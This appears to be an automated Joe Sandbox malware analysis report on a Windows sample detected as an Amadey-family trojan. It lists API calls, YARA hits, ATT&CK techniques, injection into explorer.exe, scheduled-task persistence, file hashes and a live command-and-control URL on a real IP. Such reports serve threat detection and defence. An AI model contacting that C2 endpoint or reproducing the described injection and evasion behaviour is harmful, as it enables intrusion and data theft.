Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_03242321 GetLocaleInfoW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_032423C8 EnumSystemLocalesW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_03242126 GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_0324278C GetLocaleInfoW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_03242539 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_03242413 EnumSystemLocalesW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_032424AE EnumSystemLocalesW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_032384BC EnumSystemLocalesW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_03242A87 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_032429B8 GetLocaleInfoW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_032389DE GetLocaleInfoW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_032428B2 GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\Desktop\pTvHtQDXio.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\7964f6ae VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe; Queries volume information: C:\Windows\SysWOW64\explorer.exe VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_0322A8B5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 10_2_032061F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0323E98E _free,_free,_free,GetTimeZoneInformation,_free,10_2_0323E98E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032091B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,10_2_032091B0

Stealing of Sensitive Information

Source: Yara match, File source: 2.2.more.com.5cd00c8.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.explorer.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.more.com.5cd00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.1577858534.0000000005CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\nlhiojbr, type: DROPPED

Remote Access Functionality

Source: more.com, 00000002.00000002.1577858534.0000000005CD0000.00000004.00001000.00020000.00000000.sdmp, String found in binary or memory: net start termservice
Source: more.com, 00000002.00000002.1577858534.0000000005CD0000.00000004.00001000.00020000.00000000.sdmp, String found in binary or memory: [long encoded string blob not reproduced]
Source: explorer.exe, String found in binary or memory: net start termservice
Source: explorer.exe, 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp, String found in binary or memory: net start termservice
Source: explorer.exe, 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp, String found in binary or memory: [long encoded string blob not reproduced]
Source: nlhiojbr.2.dr, String found in binary or memory: net start termservice
Source: nlhiojbr.2.dr, String found in binary or memory: [long encoded string blob not reproduced]
Mitre Att&ck Matrix

Techniques listed per tactic; a number in parentheses is the report's hit count for that technique.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Scheduled Task/Job (1); DLL Side-Loading (11); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection (511); Scheduled Task/Job (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (11); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (31); Process Injection (511); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); DLL Side-Loading (11); Indicator Removal from Tools; HTML Smuggling
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Security Software Discovery (231); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (134)
Lateral Movement: Remote Desktop Protocol (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Screen Capture (1); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (11); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph

Behavior Graph ID: 1576147, Sample: pTvHtQDXio.exe, Start date: 16/12/2024, Architecture: WINDOWS, Score: 100
Start node signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for dropped file; 6 other signatures
Start -> pTvHtQDXio.exe (started); Start -> comet.exe (started)
pTvHtQDXio.exe signatures: Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR)
pTvHtQDXio.exe -> more.com (started); comet.exe -> WerFault.exe (started)
more.com dropped file: C:\Users\user\AppData\Local\Temp\nlhiojbr, PE32
more.com signatures: Contains functionality to start a terminal service; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 2 other signatures
more.com -> explorer.exe (started); more.com -> conhost.exe (started)
explorer.exe DNS/IP: 62.60.226.15, ports 49714, 49715, 49717, ASLINE-AS-APASLINELIMITEDHK, Iran (ISLAMIC Republic Of)
explorer.exe signatures: System process connects to network (likely due to code injection or exploit); Contains functionality to start a terminal service; Contains functionality to inject code into remote processes; Switches to a custom stack to bypass stack traces

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
pTvHtQDXio.exe | 50% | ReversingLabs | Win32.Worm.AutoRun

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nlhiojbr | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\nlhiojbr | 50% | ReversingLabs | Win32.Trojan.Generic

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://62.60.226.15/8fj482jd9/index.php | 0% | Avira URL Cloud | safe
http://62.60.226.15/8fj482jd9/index.php5 | 0% | Avira URL Cloud | safe
https://vovsoft.com/php/ocr_download.php?lang= | 0% | Avira URL Cloud | safe
http://62.60.226.15/8fj482jd9/index.php3 | 0% | Avira URL Cloud | safe
http://62.60.226.15/8fj482jd9/index.php?B | 0% | Avira URL Cloud | safe
http://www.color.org | 0% | Avira URL Cloud | safe
http://62.60.226.15/ | 0% | Avira URL Cloud | safe
http://62.60.226.15/8fj482jd9/index.php1 | 0% | Avira URL Cloud | safe
https://vovsoft.com/translation/openU | 0% | Avira URL Cloud | safe
No contacted domains info

Name | Malicious | Antivirus Detection | Reputation
http://62.60.226.15/8fj482jd9/index.php | true | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://vovsoft.com/blog/how-to-activate-using-license-key/openU | pTvHtQDXio.exe | false | | high
http://62.60.226.15/ | explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.vmware.com/0 | pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://vovsoft.com | pTvHtQDXio.exe | false | | high
http://www.aiim.org/pdfa/ns/id/ | pTvHtQDXio.exe | false | | high
https://vovsoft.com/translation/ | pTvHtQDXio.exe | false | | high
https://vovsoft.com/php/ocr_download.php?lang= | pTvHtQDXio.exe | false | Avira URL Cloud: safe | unknown
http://www.vmware.com/0/ | pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://vovsoft.com/help/ | pTvHtQDXio.exe | false | | high
http://vovsoft.comopenU | pTvHtQDXio.exe | false | | high
http://www.indyproject.org/ | pTvHtQDXio.exe | false | | high
http://vovsoft.comopenS | pTvHtQDXio.exe | false | | high
http://62.60.226.15/8fj482jd9/index.php?B | explorer.exe, 0000000A.00000002.3893734835.0000000003347000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.symauth.com/cps0( | pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.color.org | pTvHtQDXio.exe | false | Avira URL Cloud: safe | unknown
https://vovsoft.com/blog/credits-and-acknowledgements/open | pTvHtQDXio.exe | false | | high
http://62.60.226.15/8fj482jd9/index.php3 | explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://vovsoft.com/ | pTvHtQDXio.exe | false | | high
http://62.60.226.15/8fj482jd9/index.php5 | explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.symauth.com/rpa00 | pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://62.60.226.15/8fj482jd9/index.php1 | explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU | pTvHtQDXio.exe | false | | high
https://vovsoft.com/translation/openU | pTvHtQDXio.exe | false | Avira URL Cloud: safe | unknown
http://www.info-zip.org/ | pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004DA1000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.00000000050D4000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.00000000052BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/search?q=openSV | pTvHtQDXio.exe | false | | high
http://vovsoft.com/openU | pTvHtQDXio.exe | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
62.60.226.15 | unknown | Iran (ISLAMIC Republic Of) | 18013 | ASLINE-AS-APASLINELIMITEDHK | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576147
Start date and time: 2024-12-16 15:25:14 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: pTvHtQDXio.exe (renamed because the original name is a hash value)
Original Sample Name: 7c23cca92ddabc20911e0c51e19b002b.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@8/7@0/1
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 27
• Number of non-executed functions: 93
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.21, 4.175.87.197, 40.126.53.8
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target comet.exe, PID 7580, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big: too many NtDeviceIoControlFile calls found
• Report size getting too big: too many NtQueryValueKey calls found
• VT rate limit hit for: pTvHtQDXio.exe
Time | Type | Description
09:26:27 | API Interceptor | 1x Sleep call for process: pTvHtQDXio.exe modified
09:26:41 | API Interceptor | 10117975x Sleep call for process: explorer.exe modified
09:27:04 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
15:26:36 | Task Scheduler | Run new task: comet path: C:\Users\user\AppData\Roaming\ancar\comet.exe
No context
No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ASLINE-AS-APASLINELIMITEDHK | IGz.arm7.elf | malicious | Mirai | 213.176.118.46
ASLINE-AS-APASLINELIMITEDHK | sh4.xxx.elf | malicious | Gafgyt, Mirai | 185.177.25.107
ASLINE-AS-APASLINELIMITEDHK | i586.xxx.elf | malicious | Gafgyt, Mirai | 185.177.25.107
ASLINE-AS-APASLINELIMITEDHK | x86.xxx.elf | malicious | Gafgyt, Mirai | 185.177.25.107
ASLINE-AS-APASLINELIMITEDHK | x32.xxx.elf | malicious | Gafgyt, Mirai | 185.177.25.107
ASLINE-AS-APASLINELIMITEDHK | arm5.xxx.elf | malicious | Gafgyt, Mirai | 185.177.25.107
ASLINE-AS-APASLINELIMITEDHK | mips.xxx.elf | malicious | Gafgyt, Mirai | 185.177.25.107
ASLINE-AS-APASLINELIMITEDHK | arm7.xxx.elf | malicious | Gafgyt, Mirai | 185.177.25.107
ASLINE-AS-APASLINELIMITEDHK | m68k.xxx.elf | malicious | Gafgyt, Mirai | 185.177.25.107
ASLINE-AS-APASLINELIMITEDHK | ppc.xxx.elf | malicious | Gafgyt, Mirai | 185.177.25.107

No context
No context
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8769037135332906
                                                Encrypted:false
                                                SSDEEP:96:gMuFQIFdSmsF4LXKWfxhQXIDcQtc6JXcENcw3nO+HbHgA5JHQbaVDPCEUjUg9Ot9:03FdSmu0Tt3z/jDRMzuiFYZ24IO8LC
                                                MD5:F6EB156CE4A6ACD7723A01E29324B549
                                                SHA1:EE4D7EC5E6558465F2DB9D976AD63718933B2C58
                                                SHA-256:7226872CFA948535BC4D47CF9B1FCB9C96C30CC40ABA80AEC9C5DD50275A7DDF
                                                SHA-512:9CDFF4BE82F851D39A24B78E312FA0616EC0030AFB1DFD9C059A1B5E957555112ACC80D2A2643769BE95F12058F9702C411E45A8BF299AC346007CEE0B80CEEA
                                                Malicious:false
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.3.2.7.9.7.6.0.4.2.6.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.8.3.2.7.9.8.6.0.4.2.6.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.0.4.a.4.4.f.-.3.8.5.1.-.4.8.b.d.-.8.7.4.d.-.d.a.a.e.9.a.6.9.e.e.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.a.0.6.8.f.c.-.5.c.b.c.-.4.e.3.9.-.a.4.a.5.-.8.b.e.3.3.1.3.5.d.4.1.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.o.m.e.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.i.t.i.z.e.n.M.P...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.c.-.0.0.0.1.-.0.0.1.3.-.3.5.0.7.-.a.6.8.3.c.6.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.3.9.e.a.4.9.c.a.e.e.b.a.0.d.d.c.d.e.b.a.1.1.d.b.5.3.9.9.3.7.c.0.0.0.0.0.9.0.4.!.0.0.0.0.f.0.e.0.7.a.6.8.c.a.3.6.6.8.1.e.c.e.4.2.c.2.3.d.7.5.3.5.1.d.5.1.a.9.b.5.2.a.8.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 15 streams, Mon Dec 16 14:26:38 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):50084
                                                Entropy (8bit):2.008009381966637
                                                Encrypted:false
                                                SSDEEP:192:UEk+aXfhkPV+O5dIPxxrAQYITCE0zOwQ0nuzPPtwGIGotsK8MM:zCkHDIPbrAQnMOwnQt9Zo7k
                                                MD5:D361C816E90B42E3500363DF1D8E7E59
                                                SHA1:ACA31A636E4095E0105D464E1ED0A36668A09F93
                                                SHA-256:5C973F252227364BA0860AF174267C94A6083F86F5CFE13AB28598EC7A89D5EB
                                                SHA-512:80D61029247D7A10FA834A1838ECA3AEF84137B54F7282757D853826FF58281B2FEC005ED795EF83D76BAC0638C4D93CFCCA4C888F5DFB15D6E1E58FF727B28C
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ........8`g....................................$................,..........`.......8...........T......................................................................................................................eJ..............GenuineIntel............T............8`g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6272
                                                Entropy (8bit):3.7185840178403047
                                                Encrypted:false
                                                SSDEEP:96:RSIU6o7wVetbr565bKYN0VOLhT+lr75aM4U+89bPo5sfja9em:R6l7wVeJr564YCkhCbpr+89bg5sfuAm
                                                MD5:47DDFCC7D7474ED053C494644CDD9738
                                                SHA1:084861DE9C7A73DA9299221EA819C641F1B1B78B
                                                SHA-256:75075D25851F71896C0EBE3096B4EFDB1A7BDDB9DE332E1CCE689E134AA44DDF
                                                SHA-512:40185F6DDE6234DB538E8C1E20D68FB6BA34DFE61D58CC040F5BB4620E86997FF2FAF0F45EAF27E3D9A02A58DD9286E18CF893995636A61FFBA458A7662BC942
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.8.0.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4625
                                                Entropy (8bit):4.446841609991673
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zscJg77aI9o7WpW8VYInYm8M4JngFUE+q80Fjw4eJd:uIjfaI7WK7V0J1ETjw4eJd
                                                MD5:EC7799EE4872D1DC6D9A973D7617824D
                                                SHA1:8C4CD6F8659474F3112C45B5311BFED5AA5F0A21
                                                SHA-256:32A1AEF0C0108C841BAC913F54A23929023CAC441356912ECFD179DF2FEEE7A4
                                                SHA-512:401B19EB0CF1B9121FE0F590BBE55E6C1E4244CB0025CAE60EA95789D9BA568BDD384537E066DC8E244062FFCBEFE9703E27694E13CCC6509D95EF9B2765E682
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="633929" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Users\user\Desktop\pTvHtQDXio.exe
                                                File Type:PNG image data, 2688 x 523, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):1167079
                                                Entropy (8bit):7.995473296971856
                                                Encrypted:true
                                                SSDEEP:24576:/s+ZOY+hto8bOn9Vb7RQnI/Itr0Qf/ZUMPZb6g5OH9xJ9WFi6M:Z+htxbOn9Vb7RQnd0G/Zb569xJJH
                                                MD5:D2AC740E7F02D1857D23CC613D2A3015
                                                SHA1:333427371D9FF322E761D306A42AB0D6A863E6F9
                                                SHA-256:B820EC17CFC9EEC57CABAA1B6E79173A5E6EF6BC0FDF0B456EC943E02BCA4D5F
                                                SHA-512:8A91B783255E60BF95F7653F2E5ECB693A009BABB580E37130721D845DDFC73ECE82A669E9EBF01FAEC7A10598C3603ECE8D82F130BC567F8747A7A72BB29933
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR.............M.[*.. .IDATx..wX.Y...L&.T.F@W.,......W...b. *(..."...{..b...J...+*....T..b[......I.S.AT...y.y(..w..;....$.N6`.....`......o...-.A..8....&.s.J.s...BQ.~....?.o.j..K...t:.X,......E....... .|....X,..oAQ.8:.1....8.h4.K..h4......K.F.0...V.)/..jMG7^..q......k...DX....at6..'.V.M.;..BY(.R..`l....p-at6. ..R...P..Z....pt\W....Z[.-...$...1b../&.`d.(a.)o.....q.'....#....0...3.O@.. ...[X,..S.F..@>.p.bt=.k..#.8.S......?4%..8.k...3.J4!..hE......|B.1b.#.K...s..=.A..1......_....0 S>. p..x)......s.O...Q.q......P.A.b1..H.(j...l./..KI..K..l8...l.|.j5!.7..j........jt...,.........l.p.N..._F.....<H`..F$1..F..1..s0.C.4..s.L.NH.2..t........t........./E..@.a..... ....u....."(.pB\@....9........... .3...)..G....at..b.@>.........U.l!.bh..p...?#...}Q}...j.........?. .x..@.._b..-.R..6......d.........|.....8N...C.NKA...7......C.."....\..!.P@>........1( ........U.s..1.@p..t.....)..d......\.F..1....?..U..l..j...Y(..&.<..........K.|...1.....Q...0..
                                                Process:C:\Users\user\Desktop\pTvHtQDXio.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1174134
                                                Entropy (8bit):7.600376035602856
                                                Encrypted:false
                                                SSDEEP:24576:fQZT3SlEwCflcLITJDIQmfOl59RgXpDx0BRKGrE:fQZT3SlEwCWIIfCNqpDxsRrE
                                                MD5:21954399F545BFDD16767A1C22F37DA3
                                                SHA1:516E5F1C659326F3F11B672CD12BF56BF88E2768
                                                SHA-256:987B8430FF016AF3AF88E6AA88796F478B2F1AD5B3B9ADE8A023DA8F2B27A6C8
                                                SHA-512:A13881297C64264AA14EC4FEACE01B2DF5A1507C889B9E2CBAB60CC36C5ED18D769CC839F90FE02C7A838B42885B4A48F99728BF10D88160C2D6B8361FE0CABC
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\more.com
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):442880
                                                Entropy (8bit):6.4982216030674
                                                Encrypted:false
                                                SSDEEP:12288:Hj98bKozHw6UGa0WPp7XlcoMGXidheK7t5kMT:mHwBhBbMUi2IkU
                                                MD5:CDD48A5FDFA37AC1971CCD04D513FCCE
                                                SHA1:4FB51E67F61373E2854B26D9DBA339C51D93D375
                                                SHA-256:BCDE8C2C0B3927A17000D4D8094270909726580526B6D719143BA61B09A05950
                                                SHA-512:5B4E8A01A52CDE7A711E79A3D04144AF839F8C5B2E3662025BEBFA55E94C91A974D0493A2F0DC52A7D31ABE2043DC301407B9245DED8F53E5297C7942026BD61
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\nlhiojbr, Author: Joe Security
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 50%
